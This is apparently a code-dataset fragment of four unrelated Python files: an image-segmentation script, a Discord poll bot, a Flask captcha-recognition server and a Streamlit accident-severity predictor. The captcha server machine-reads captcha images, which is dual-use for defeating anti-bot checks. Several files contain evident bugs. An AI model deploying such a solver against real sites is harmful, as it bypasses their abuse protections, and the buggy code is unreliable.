'OTSU', 100, 'no3D'], # checked\n ['CLS', 'bin', 5], # checked\n ['FILL'],\n ['OPN', 'bin', 2], # checked\n ['CONV_BIT', 16, '3D'],\n ['LABEL', 1, 'no3D']\n]\n\nTHR_STEP = 1\n\ndilate_step = [\n ['DIL', 'bin', 50]\n]\n\nfinal_steps = [\n ['CLS', 'bin', 30],\n ['FILL']\n]\n\narea_threshold = 1000\n\ncheck_params = False\nactive_contour = True\ncalc_union = False\nsave_as_stack = False\nshow_stack = True\nshow_range = range(0, 1, 1)\n\n###\n# Go through defined images and process\n###\n\nresults = list()\nresults_titles = list()\n\nfor i, pouch_stack in enumerate(pouch_stacks):\n print('--- PROCESS %i' % i)\n\n results.append(pouch_stack)\n results_titles.append('Original')\n\n pouch_volumes = list()\n\n if check_params is True:\n for i in range(0, 51, 10):\n processing_steps[1][2] = i\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, pouch_stack, verbose=True))\n results.append(pouch_volumes[-1])\n results_titles.append('THR %i' % i)\n else:\n # set threshold\n processing_steps[THR_STEP][2] = pouch_thrs[i]\n\n pouch_volumes.append(ImageProcessing.apply_filters(processing_steps, 
pouch_stack, verbose=True))\n results.append(pouch_volumes[-1])\n results_titles.append('Threshold')\n\n # NEXT: Test active contours\n # ERROR: TypeError: 'bool' object is not callable\n if active_contour is True:\n s = np.linspace(0, 2*np.pi, 400)\n x = 600 + 300*np.cos(s)\n y = 585 + 300*np.sin(s)\n init = np.array([x, y]).T\n\n snake_img = active_contour(pouch_imgs[-1][0], init, alpha=0.015, beta=10, gamma=0.001)\n results.append(snake_img)\n results_titles('Snake')\n\n if calc_union is True:\n # go through labels and filter small ones\n pouch_volume_filtered = np.zeros_like(pouch_volumes[-1])\n union_pouch_volume = np.zeros_like(pouch_volumes[-1])\n\n for z in range(0, pouch_volumes[-1].shape[0]):\n print('- GET PROPS for z: %i' % z)\n\n z_props = regionprops(pouch_volumes[-1][z])\n\n # a list of dilated images\n dilated_imgs = list()\n\n # go through and filter by size\n for props in z_props:\n if props['area'] > area_threshold:\n # add to image\n dilated_imgs.append(np.zeros_like(union_pouch_volume[z]))\n\n for i, coords in enumerate(props['coords']):\n pouch_volume_filtered[z][int(coords[0]), int(coords[1])] = 1\n dilated_imgs[-1][int(coords[0]), int(coords[1])] = 1\n\n # dilate\n dilated_imgs[-1] = ImageProcessing.apply_filters(dilate_step, dilated_imgs[-1], verbose=True)\n\n print('- CALC UNION for %i dilated images' % len(dilated_imgs))\n\n # go through all dilated images and add union\n for o, dilated_outer in enumerate(dilated_imgs):\n for i, dilated_inner in enumerate(dilated_imgs):\n if o != i:\n union_pouch_volume[z] += np.logical_and(dilated_outer, dilated_inner)\n\n # add filtered and union to results\n pouch_volumes.append(pouch_volume_filtered)\n results.append(pouch_volumes[-1])\n results_titles.append('Filtered')\n\n pouch_volumes.append(union_pouch_volume)\n results.append(pouch_volumes[-1])\n results_titles.append('Union')\n\n # add union to filtered\n pouch_volume_final = pouch_volume_filtered + union_pouch_volume\n pouch_volume_final[pouch_volume_final > 1] = 1\n\n #for i in range(20, 41, 5):\n # final_steps[0][2] = i\n # pouch_volumes.append(ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True))\n # results_titles.append('CLS %i' % i)\n\n pouch_volume_final = ImageProcessing.apply_filters(final_steps, pouch_volume_final, verbose=True)\n\n results.append(pouch_volume_final)\n results_titles.append('Volume #%i' % i)\n\n if save_as_stack is True:\n ImageHandler.save_stack_as_tiff(pouch_volume_final, work_dir + ('%s_pv.tif' % pouch_files[i]))\n\n if show_stack is True:\n # show images\n stack_fig = plt.figure(figsize=(20, 10))\n\n # view the stack and the processing results\n\n cmap = list()\n for i in range(0, len(results)):\n cmap.append('hot')\n\n Plot.show_stacks(stack_fig, results, show_range, img_title=results_titles, colour_map=cmap)\n", "repo_name": "baemms/NucleoSegment", "sub_path": "playground/pouch_volume_r2.py", "file_name": "pouch_volume_r2.py", "file_ext": "py", "file_size_in_byte": 6218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "skimage.io.imread", "line_number": 44, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 44, "usage_type": "name"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 81, "usage_type": "name"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 105, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 105, "usage_type": 
"name"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 112, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 112, "usage_type": "name"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 118, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 122, "usage_type": "call"}, {"api_name": "skimage.segmentation.active_contour", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 131, "usage_type": "call"}, {"api_name": "skimage.measure.regionprops", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 145, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 152, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.logical_and", "line_number": 160, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing.apply_filters", "line_number": 180, "usage_type": "call"}, {"api_name": "processing.image.ImageProcessing", "line_number": 180, "usage_type": "name"}, {"api_name": "storage.image.ImageHandler.save_stack_as_tiff", "line_number": 186, "usage_type": "call"}, {"api_name": "storage.image.ImageHandler", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "frontend.figures.plot.Plot.show_stacks", "line_number": 198, "usage_type": "call"}, {"api_name": "frontend.figures.plot.Plot", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "22262112779", "text": "##################################\n# Disabled Needs To Be Re-writen #\n##################################\n\nimport discord\nimport datetime\nimport asyncio\nimport re\nimport global_functions\nimport custom_checks\nfrom discord.ext import commands\nfrom discord.commands import slash_command\n\nclient = discord.Client()\n\n\nemojis = \"🇦 🇧 🇨 🇩 🇪 🇫 🇬 🇭 🇮 🇯 🇰 🇱 🇲 🇳 🇴 🇵 🇶 🇷 🇸 🇹\".split()\nfor i in emojis:\n i.replace(' ', '')\n\ndays = 0\nhours = 0\nminutes = 0\ntimeSeconds = 0\n\n\nclass Poll(discord.Cog):\n\n @slash_command()\n @custom_checks.has_perms(\"poll\")\n async def poll(self, ctx, *, content):\n \"\"\"\n Makes A Poll That Users Can Vote On.\n \"\"\"\n global seconds\n msg = content.split(\",\")\n for field in msg:\n field.strip()\n\n try:\n timeLimitInput = msg[1]\n prevTimeLimitInputPos = 0\n for i in [\"d\", \"h\", \"m\", \"s\"]:\n timeInputPos = re.search(i, timeLimitInput)\n if timeInputPos != None:\n if int(timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]].strip()):\n if i == \"d\":\n days = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"h\":\n hours = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"m\":\n minutes = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n elif i == \"s\":\n timeSeconds = timeLimitInput[prevTimeLimitInputPos:timeInputPos.span()[0]]\n\n prevTimeLimitInputPos = timeInputPos.span()[0] + 1\n\n else:\n if 
i == \"d\":\n days = 0\n elif i == \"h\":\n hours = 0\n elif i == \"m\":\n minutes = 0\n elif i == \"s\":\n timeSeconds = 0\n\n except:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"error\",\n description=\n \"Please Enter A Time In Numbers In The 3rd Position\\n\"\n \"Ex: 3d12h30m30s Meaning 3 Days 12 Hours 30 Minutes And 30 Seconds\"))\n return\n\n embed = discord.Embed(title=msg[0],\n type=\"rich\",\n color=0x08D4D0,\n timestamp=(datetime.timedelta(days=int(days),\n hours=int(hours),\n minutes=int(minutes),\n seconds=int(timeSeconds)) + datetime.datetime.now()))\n embed.set_footer(text=\"Ends\")\n\n options = ''\n count = 0\n del msg[0]\n del msg[0]\n if len(msg) > 20 or len(msg) < 1:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"error\",\n description=\"You Must Have 1-20 Options\"))\n return\n for i in msg:\n options = options + emojis[count] + \" \" + i + \"\\n\"\n count += 1\n embed.add_field(name=\"Options\", value=options, inline=False)\n ctx = await ctx.channel.respond(embed=embed)\n for i in range(len(msg)):\n await ctx.add_reaction(emojis[i])\n messageId = ctx.id\n\n endTime = datetime.datetime.now() + datetime.timedelta(days=int(days),\n hours=int(hours),\n minutes=int(minutes),\n seconds=int(timeSeconds))\n seconds = endTime - datetime.datetime.now()\n await asyncio.sleep(seconds.total_seconds())\n ctx = await ctx.channel.fetch_message(messageId)\n winingNumber = 0\n winner = []\n for i in ctx.reactions:\n if i.count == winingNumber:\n winingNumber = i.count\n winner.append(i)\n elif i.count > winingNumber:\n winingNumber = i.count\n winner.clear()\n winner.append(i)\n if len(winner) > 1:\n resultmessage = \"There was a tie between\"\n for i in range(len(winner)):\n resultmessage = resultmessage + \" - \" + str(winner[i])\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"\",\n description=resultmessage))\n else:\n await ctx.channel.respond(embed=await global_functions.create_embed(title=\"\",\n description=\n \"The wining choice was \" + str(winner[0])))\n\n @poll.error\n async def whitelist_error(self, ctx, error):\n if isinstance(error, commands.CheckFailure):\n await ctx.respond(embed=await global_functions.create_embed(title=\"fail\",\n description=\n \"You Do Not Have Permission To Preform That Command\"))\n\n\ndef setup(client):\n client.add_cog(Poll(client))\n", "repo_name": "Icebluewolf/Wolfy-Discord-Bot", "sub_path": "cogs/poll.py", "file_name": "poll.py", "file_ext": "py", "file_size_in_byte": 5796, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "discord.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "discord.Cog", "line_number": 27, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 44, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 69, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 75, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 78, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "attribute"}, {"api_name": "global_functions.create_embed", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 101, "usage_type": "attribute"}, {"api_name": 
"datetime.timedelta", "line_number": 101, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 105, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 105, "usage_type": "attribute"}, {"api_name": "asyncio.sleep", "line_number": 106, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 122, "usage_type": "call"}, {"api_name": "global_functions.create_embed", "line_number": 125, "usage_type": "call"}, {"api_name": "discord.commands.slash_command", "line_number": 29, "usage_type": "call"}, {"api_name": "custom_checks.has_perms", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands.CheckFailure", "line_number": 131, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 131, "usage_type": "name"}, {"api_name": "global_functions.create_embed", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "30979165647", "text": "from flask import Flask, url_for\nfrom flask import request\nfrom flask import json\nfrom skimage import io\nfrom skimage import color\nimport numpy as np\nimport os\nimport re\nfrom keras.models import Model\nfrom keras.models import load_model\nimport base64\nimport uuid\nimport gevent\nfrom gevent.pywsgi import WSGIServer\nfrom gevent import monkey\nmonkey.patch_all()\n\napp = Flask(__name__)\n\nmodel = None\n\ndef loading():\n global model\n model = load_model('../model/model-45.hdf5')\n\n# 构建映射字典\nlabels = ['a','b','c','d','e','f','g',\n 'h','i','j','k','l','m','n',\n 'u','p','q','r','s','t','o',\n 'v','w','x','y','z','0','1',\n '2','3','4','5','6','7','8','9']\nlabel2id = {}\nid2label = {}\n\nfor label in labels:\n label2id[label] = len(label2id)\nfor label, id in label2id.items():\n id2label[id] = label\n\ndef decode(y):\n y = np.argmax(np.array(y), axis=-1)\n return ''.join([id2label[x] for x in y])\n\n@app.route('/')\ndef api_root():\n return 'Welcome'\n\n@app.route('/captcha', methods = ['POST'])\ndef api_message():\n base64_str = ''\n if request.headers['Content-Type'] == 'text/plain':\n base64_str = request.data\n elif request.headers['Content-Type'] == 'application/json':\n base64_str = request.json.get('pic', '')\n else:\n return json.dumps({\"status\":\"NO\", \"msg\":\"request head not support\"})\n if base64_str:\n result = re.search(\"data:image/(?P.*?);base64,(?P.*)\", base64_str, re.DOTALL)\n if result:\n ext = result.groupdict().get(\"ext\")\n data = result.groupdict().get(\"data\")\n else:\n data = src\n try:\n imgdata = base64.b64decode(data)\n tempfilename = str(uuid.uuid1()) + '.png'\n file = open(tempfilename,'wb')\n file.write(imgdata)\n file.close()\n im = io.imread(tempfilename)\n im3 = color.rgb2gray(im)\n pic = np.asarray([np.expand_dims(im3, axis=2)])\n result = np.squeeze(model.predict(pic))\n os.remove(tempfilename)\n return json.dumps({\"status\":\"OK\", \"result\": decode(result)})\n except:\n return json.dumps({\"status\":\"NO\", \"msg\":\"error\"})\n else:\n return json.dumps({\"status\":\"NO\", \"msg\":\"input base64 is empty\"})\n\nif __name__ == '__main__':\n loading() # 加载模型\n http_server = WSGIServer(('127.0.0.1', 8090), app)\n http_server.serve_forever()\n", "repo_name": "jsksxs360/captcha_identification", "sub_path": "src/start_server.py", "file_name": "start_server.py", "file_ext": "py", "file_size_in_byte": 2460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "46", "api": [{"api_name": "gevent.monkey.patch_all", "line_number": 16, "usage_type": "call"}, 
{"api_name": "gevent.monkey", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.Flask", "line_number": 18, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.headers", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "flask.request.data", "line_number": 52, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.request.headers", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 53, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 56, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 56, "usage_type": "name"}, {"api_name": "re.search", "line_number": 58, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 58, "usage_type": "attribute"}, {"api_name": "base64.b64decode", "line_number": 65, "usage_type": "call"}, {"api_name": "uuid.uuid1", "line_number": 66, "usage_type": "call"}, {"api_name": "skimage.io.imread", "line_number": 70, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 70, "usage_type": "name"}, {"api_name": "skimage.color.rgb2gray", "line_number": 71, "usage_type": "call"}, {"api_name": "skimage.color", "line_number": 71, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 73, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 74, "usage_type": "call"}, {"api_name": "flask.json.dumps", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 77, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 77, "usage_type": "name"}, {"api_name": "flask.json.dumps", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 79, "usage_type": "name"}, {"api_name": "gevent.pywsgi.WSGIServer", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "20670845971", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport joblib\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom prediction import get_prediction, ordinal_encoder\nfrom load_model import get_model\n\nmodel = get_model(model_path = r'Model/RTA_model.joblib')\n#model = joblib.load(r\"RTA_model.joblib\")\n\nst.set_page_config(page_title=\"Accident Severity Prediction App\",\n page_icon=\"🚧\", layout=\"wide\")\n\n\n#creating option list for dropdown menu\n\noptions_day = ['Sunday', \"Monday\", \"Tuesday\", \"Wednesday\", \"Thursday\", \"Friday\", \"Saturday\"]\n\noptions_age = ['18-30', '31-50', 'Over 51', 'Unknown', 'Under 18']\n\noptions_sex = ['Male', 'Female', 'Unknown']\n\noptions_edu = ['Above high school', 'Junior high school', \n 'Elementary school' ,'High school', 'Unknown', 'Illiterate', 'Writing & reading']\n\noptions_exp 
= ['1-2yr', 'Above 10yr', '5-10yr', '2-5yr', 'No Licence', 'Below 1yr', 'unknown']\n\noptions_vehicle = ['Automobile', 'Public (> 45 seats)', 'Lorry (41–100Q)', 'Public (13–45 seats)', 'Lorry (11–40Q)', 'Long lorry', 'Public (12 seats)', 'Taxi', 'Pick up upto 10Q', 'Stationwagen', 'Ridden horse', 'Other', 'Bajaj', 'Turbo', 'Motorcycle', 'Special vehicle', 'Bicycle']\n\noptions_vehicle_owner = ['Owner', 'Governmental','Organization', 'Other']\n\noptions_service_year = ['Above 10yr', '5-10yrs', '1-2yr', '2-5yrs', 'Unknown', 'Below 1yr'] \n \noptions_acc_area = ['Other', 'Office areas', 'Residential areas', ' Church areas',\n       ' Industrial areas', 'School areas', ' Recreational areas',\n       ' Outside rural areas', ' Hospital areas', ' Market areas',\n       'Rural village areas', 'Unknown', 'Rural village areasOffice areas',\n       'Recreational areas']\n\noptions_lanes = ['Undivided Two way', 'other', 'Double carriageway (median)', 'One way', 'Two-way (divided with solid lines road marking)', 'Two-way (divided with broken lines road marking)']\n\noptions_allignment = ['Tangent road with flat terrain','Tangent road with mild grade and flat terrain', 'Escarpments',\n       'Tangent road with rolling terrain', 'Gentle horizontal curve', 'Tangent road with mountainous terrain and',\n       'Steep grade downward with mountainous terrain', 'Sharp reverse curve',\n       'Steep grade upward with mountainous terrain']\n\noptions_junction = ['No junction', 'Y Shape', 'Crossing', 'O Shape', 'Other', 'Unknown', 'T Shape', 'X Shape']\n\noptions_surface_type = ['Asphalt roads', 'Earth roads','Asphalt roads with some distress', 'Gravel roads', 'Other']\n \noptions_surface_conditions = ['Dry', 'Wet or damp', 'Snow', 'Flood over 3cm. deep']\n\noptions_light = ['Daylight', 'Darkness - lights lit', 'Darkness - no lighting', 'Darkness - lights unlit']\n\noptions_weather = ['Normal', 'Raining', 'Raining and Windy', 'Cloudy', 'Other', 'Windy', 'Snow', 'Unknown', 'Fog or mist']\n\noptions_collision = ['Collision with roadside-parked vehicles', 'Vehicle with vehicle collision',\n       'Collision with roadside objects', 'Collision with animals', 'Other', 'Rollover', 'Fall from vehicles',\n       'Collision with pedestrians', 'With Train', 'Unknown']\n \n\n\noptions_vehicle_movement = ['Going straight', 'U-Turn', 'Moving Backward', 'Turnover', 'Waiting to go', 'Getting off',\n       'Reversing', 'Unknown', 'Parked', 'Stopping', 'Overtaking', 'Other', 'Entering a junction']\n\noptions_casualty_class = ['Driver or rider', 'Pedestrian', 'Passenger']\n\noptions_casualty_sex = ['Male', 'Female']\n\noptions_casualty_age = ['31-50', '18-30', 'Under 18', 'Over 51']\n\noptions_casualty_severity = ['3', '2', '1']\n \noptions_pedestrian_movement = ['Not a Pedestrian', \"Crossing from driver's nearside\",\n       'Crossing from nearside - masked by parked or stationary vehicle',\n       'Unknown or other',\n       'Crossing from offside - masked by parked or stationary vehicle',\n       'In carriageway, stationary - not crossing (standing or playing)',\n       'Walking along in carriageway, back to traffic',\n       'Walking along in carriageway, facing traffic',\n       'In carriageway, stationary - not crossing (standing or playing) - masked by parked or stationary vehicle']\n\n\noptions_cause = ['No distancing', 'Changing lane to the right',\n       'Changing lane to the left', 'Driving carelessly',\n       'No priority to vehicle', 'Moving Backward',\n       'No priority to pedestrian', 'Other', 'Overtaking',\n       'Driving under the influence of drugs', 'Driving to 
the left',\n 'Getting off the vehicle improperly', 'Driving at high speed',\n 'Overturning', 'Turnover', 'Overspeed', 'Overloading', 'Drunk driving',\n 'Unknown', 'Improper parking']\n\n\n\n\nfeatures = ['day_of_week', 'driver_age', 'driver_sex', 'educational_level',\n 'driving_experience', 'vehicle_type', 'vehicle_owner', 'service_year',\n 'accident_area', 'lanes', 'road_allignment', 'junction_type',\n 'surface_type', 'road_surface_conditions', 'light_condition',\n 'weather_condition', 'collision_type', 'vehicles_involved',\n 'casualties', 'vehicle_movement', 'casualty_class', 'casualty_sex',\n 'casualty_age', 'casualty_severity', 'pedestrian_movement',\n 'accident_cause', 'hour', 'minute']\n\nst.markdown(\"
<h1 style='text-align: center;'>Accident Severity Prediction App 🚧</h1>
\", unsafe_allow_html=True)\ndef main():\n    with st.form('prediction_form'):\n\n        st.subheader(\"Enter the input for following features:\")\n        \n        vehicles_involved = st.slider(\"Select number of vehicles involved: \", 1, 7, value=1, format=\"%d\")\n        casualties = st.slider(\"Select number of casualties involved: \", 1, 8, value=1, format=\"%d\")\n        hour = st.slider(\"Select hour of accident: \", 0, 23, value=0, format=\"%d\")\n        minute = st.slider(\"Select minute of accident: \", 0, 59, value=0, format=\"%d\")\n        day_of_week = st.selectbox(\"Select day of the week: \", options=options_day)\n        driver_age = st.selectbox(\"Select driver age: \", options=options_age)\n        driver_sex = st.selectbox(\"Select driver sex: \", options=options_sex)\n        education = st.selectbox(\"Select driver educational level: \", options=options_edu)\n        driver_experience = st.selectbox(\"Select driver experience: \", options=options_exp)\n        vehicle_type = st.selectbox(\"Select vehicle type : \", options=options_vehicle)\n        vehicle_owner = st.selectbox(\"Select vehicle owner : \", options=options_vehicle_owner)\n        service_year = st.selectbox(\"Select vehicle service period : \", options=options_service_year)\n        accident_area = st.selectbox(\"Select accident area: \", options=options_acc_area)\n        lanes = st.selectbox(\"Select lane: \", options=options_lanes)\n        allignment = st.selectbox(\"Select road alignment: \", options=options_allignment)\n        junction = st.selectbox(\"Select junction type: \", options=options_junction)\n        surface_type = st.selectbox(\"Select road surface type: \", options=options_surface_type)\n        surface_conditions = st.selectbox(\"Select road surface condition: \", options=options_surface_conditions)\n        light = st.selectbox(\"Select light condition: \", options=options_light)\n        weather = st.selectbox(\"Select weather condition: \", options=options_weather)\n        collision = st.selectbox(\"Select collision type: \", options=options_collision)\n        vehicle_movement = st.selectbox(\"Select vehicle movement: \", options=options_vehicle_movement)\n        casualty_class = st.selectbox(\"Select casualty class: \", options=options_casualty_class)\n        casualty_sex = st.selectbox(\"Select casualty sex: \", options=options_casualty_sex)\n        casualty_age = st.selectbox(\"Select casualty age: \", options=options_casualty_age)\n        casualty_severity = st.selectbox(\"Select casualty severity: \", options=options_casualty_severity)\n        pedestrian_movement = st.selectbox(\"Select pedestrian movement: \", options=options_pedestrian_movement)\n        cause = st.selectbox(\"Select accident cause: \", options=options_cause)\n        \n        \n        \n        submit = st.form_submit_button(\"Predict\")\n\n\n    if submit:\n        day_of_week = ordinal_encoder(day_of_week, options_day)\n        driver_age = ordinal_encoder(driver_age, options_age)\n        driver_sex = ordinal_encoder(driver_sex, options_sex)\n        education = ordinal_encoder(education, options_edu)\n        driver_experience = ordinal_encoder(driver_experience, options_exp)\n        vehicle_type = ordinal_encoder(vehicle_type, options_vehicle)\n        vehicle_owner = ordinal_encoder(vehicle_owner, options_vehicle_owner)\n        service_year = ordinal_encoder(service_year, options_service_year)\n        accident_area = ordinal_encoder(accident_area, options_acc_area)\n        lanes = ordinal_encoder(lanes, options_lanes)\n        allignment = ordinal_encoder(allignment, options_allignment)\n        junction = ordinal_encoder(junction, options_junction)\n        surface_type = ordinal_encoder(surface_type, options_surface_type)\n        surface_conditions = ordinal_encoder(surface_conditions, options_surface_conditions)\n        
light = ordinal_encoder(light, options_light)\n        weather = ordinal_encoder(weather, options_weather)\n        collision = ordinal_encoder(collision, options_collision)\n        vehicle_movement = ordinal_encoder(vehicle_movement, options_vehicle_movement)\n        casualty_class = ordinal_encoder(casualty_class, options_casualty_class)\n        casualty_sex = ordinal_encoder(casualty_sex, options_casualty_sex)\n        casualty_age = ordinal_encoder(casualty_age, options_casualty_age)\n        casualty_severity = ordinal_encoder(casualty_severity, options_casualty_severity)\n        pedestrian_movement = ordinal_encoder(pedestrian_movement, options_pedestrian_movement)\n        cause = ordinal_encoder(cause, options_cause)\n        \n        \n\n        data = np.array([vehicles_involved, casualties, hour, minute, day_of_week, driver_age, driver_sex, education,\n                        driver_experience, vehicle_type, vehicle_owner, service_year, accident_area, lanes, allignment, \n                        junction, surface_type, surface_conditions, light, weather, collision, vehicle_movement,casualty_class,\n                        casualty_sex, casualty_age, casualty_severity, pedestrian_movement, cause]).reshape(1,-1)\n\n        pred = get_prediction(data=data, model=model)\n        \n        if pred[0]==1:\n            x='Slight injury'\n        elif pred[0]==2:\n            x='Serious injury'\n        else:\n            x='Fatal injury'\n\n        st.write(f\"The predicted accident severity is: {x}\")\n\nif __name__ == '__main__':\n    main()\n\n", "repo_name": "omkarnigade21/RTA_deployment", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 10972, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "load_model.get_model", "line_number": 15, "usage_type": "call"}, {"api_name": "streamlit.set_page_config", "line_number": 18, "usage_type": "call"}, {"api_name": "streamlit.markdown", "line_number": 112, "usage_type": "call"}, {"api_name": "streamlit.form", "line_number": 114, "usage_type": "call"}, {"api_name": "streamlit.subheader", "line_number": 116, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 118, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 119, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 120, "usage_type": "call"}, {"api_name": "streamlit.slider", "line_number": 121, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 122, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 123, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 124, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 125, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 126, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 127, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 128, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 129, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 130, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 131, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 132, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 133, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 134, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 135, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 136, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 137, 
"usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 138, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 139, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 140, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 141, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 142, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 143, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 144, "usage_type": "call"}, {"api_name": "streamlit.selectbox", "line_number": 145, "usage_type": "call"}, {"api_name": "streamlit.form_submit_button", "line_number": 149, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 153, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 154, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 155, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 156, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 157, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 158, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 159, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 160, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 161, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 162, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 163, "usage_type": "call"}, {"api_name": "prediction.ordinal_encoder", "line_number": 